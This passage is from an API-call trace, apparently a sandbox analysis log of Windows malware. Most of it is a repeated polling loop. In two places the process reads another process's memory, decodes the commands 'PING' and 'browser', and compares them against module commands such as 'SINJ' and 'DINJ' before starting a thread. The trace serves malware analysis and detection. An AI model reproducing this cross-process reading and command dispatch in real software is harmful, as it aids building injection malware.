	[0244.219] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.219] Sleep (dwMilliseconds=0xbb8) 
	[0244.235] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.235] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.235] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.235] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.235] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.235] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.235] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.235] Sleep (dwMilliseconds=0xbb8) 
	[0244.250] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.250] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.250] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.250] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.250] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.250] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.251] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.251] Sleep (dwMilliseconds=0xbb8) 
	[0244.266] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.266] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.266] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.266] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.266] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.266] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.267] Sleep (dwMilliseconds=0xbb8) 
	[0244.281] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.282] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.282] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.282] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.282] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.282] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.282] Sleep (dwMilliseconds=0xbb8) 
	[0244.297] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.297] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.297] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.298] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.298] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.298] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.298] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.298] Sleep (dwMilliseconds=0xbb8) 
	[0244.313] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.313] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.313] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.313] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.313] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.314] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.314] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00d0) returned 1
	[0244.314] Sleep (dwMilliseconds=0xbb8) 
	[0244.328] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.328] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.328] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.328] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.328] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.328] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.328] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00d0) returned 1
	[0244.328] Sleep (dwMilliseconds=0xbb8) 
	[0244.344] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.344] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.344] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.344] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.344] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.344] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.344] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00d0) returned 1
	[0244.344] Sleep (dwMilliseconds=0xbb8) 
	[0244.359] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.359] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.359] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.359] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.359] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.359] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.359] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00d0) returned 1
	[0244.359] Sleep (dwMilliseconds=0xbb8) 
	[0244.375] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.375] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.376] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.376] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.376] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.376] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.376] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00d0) returned 1
	[0244.376] Sleep (dwMilliseconds=0xbb8) 
	[0244.390] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0244.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0244.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0244.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b00
	[0244.391] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0244.391] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0244.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0244.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e15e8
	[0244.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x27e15e8, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0244.391] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0244.391] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225b00, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b00*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0244.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0244.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0300
	[0244.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=-1, lpWideCharStr=0x27c0300, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0244.391] SetEvent (hEvent=0x474) returned 1
	[0244.391] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0244.391] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0244.391] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b00) returned 1
	[0244.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0058
	[0244.391] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0244.391] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0244.391] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0244.391] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0244.391] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0244.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1600
	[0244.391] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c00d0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdec) returned 0x6d0
	[0244.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c04b8
	[0244.392] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.392] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.392] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.392] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.392] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.392] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c04b8) returned 1
	[0244.392] Sleep (dwMilliseconds=0xbb8) 
	[0244.406] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.406] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.406] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.406] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.406] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.406] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.406] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c04b8) returned 1
	[0244.406] Sleep (dwMilliseconds=0xbb8) 
	[0244.422] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.422] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.422] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.422] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.422] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.422] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.422] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0260) returned 1
	[0244.422] Sleep (dwMilliseconds=0xbb8) 
	[0244.437] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.437] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.437] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.437] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.437] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.437] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.437] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0260) returned 1
	[0244.438] Sleep (dwMilliseconds=0xbb8) 
	[0244.453] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.453] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.453] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.454] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.454] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.454] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.454] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0260) returned 1
	[0244.454] Sleep (dwMilliseconds=0xbb8) 
	[0244.469] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.469] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.469] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.469] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.469] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.469] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.469] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0260) returned 1
	[0244.469] Sleep (dwMilliseconds=0xbb8) 
	[0244.485] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.485] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.485] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.485] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.485] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.485] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.485] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0260) returned 1
	[0244.485] Sleep (dwMilliseconds=0xbb8) 
	[0244.508] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.508] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.508] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.508] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.508] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.508] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.509] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0260) returned 1
	[0244.509] Sleep (dwMilliseconds=0xbb8) 
	[0244.546] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.546] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.547] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.547] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.547] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.547] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.547] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0260) returned 1
	[0244.547] Sleep (dwMilliseconds=0xbb8) 
	[0244.563] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.563] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.563] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.563] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.563] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.563] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.563] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0260) returned 1
	[0244.563] Sleep (dwMilliseconds=0xbb8) 
	[0244.577] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.578] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.578] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.578] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.578] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.578] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.578] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfea0) returned 1
	[0244.578] Sleep (dwMilliseconds=0xbb8) 
	[0244.593] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.593] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.593] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.593] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.593] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.593] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.593] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfea0) returned 1
	[0244.593] Sleep (dwMilliseconds=0xbb8) 
	[0244.621] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.621] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.621] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.621] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.621] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.621] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.621] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.621] Sleep (dwMilliseconds=0xbb8) 
	[0244.658] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.658] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.658] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.658] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.658] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.658] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.658] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.658] Sleep (dwMilliseconds=0xbb8) 
	[0244.703] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.703] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.703] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.703] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.703] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.703] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.703] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.703] Sleep (dwMilliseconds=0xbb8) 
	[0244.725] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.725] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.725] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.725] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.725] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.725] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.725] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.725] Sleep (dwMilliseconds=0xbb8) 
	[0244.734] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.734] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.734] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.734] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.735] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.735] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.735] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.735] Sleep (dwMilliseconds=0xbb8) 
	[0244.750] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.750] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.750] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.750] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.750] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.750] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.750] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.750] Sleep (dwMilliseconds=0xbb8) 
	[0244.766] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.766] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.766] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.766] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.766] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.766] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.766] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.766] Sleep (dwMilliseconds=0xbb8) 
	[0244.782] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.782] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.782] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.782] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.782] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.782] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.782] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.782] Sleep (dwMilliseconds=0xbb8) 
	[0244.797] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.797] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.797] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.797] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.797] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.797] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.797] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.797] Sleep (dwMilliseconds=0xbb8) 
	[0244.813] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.813] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.813] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.813] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.813] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.813] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.813] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.813] Sleep (dwMilliseconds=0xbb8) 
	[0244.874] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.874] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.874] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.874] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.874] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.874] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.874] Sleep (dwMilliseconds=0xbb8) 
	[0244.921] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0244.921] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0244.921] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0244.921] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0244.921] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0244.921] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0244.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0244.921] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffc30
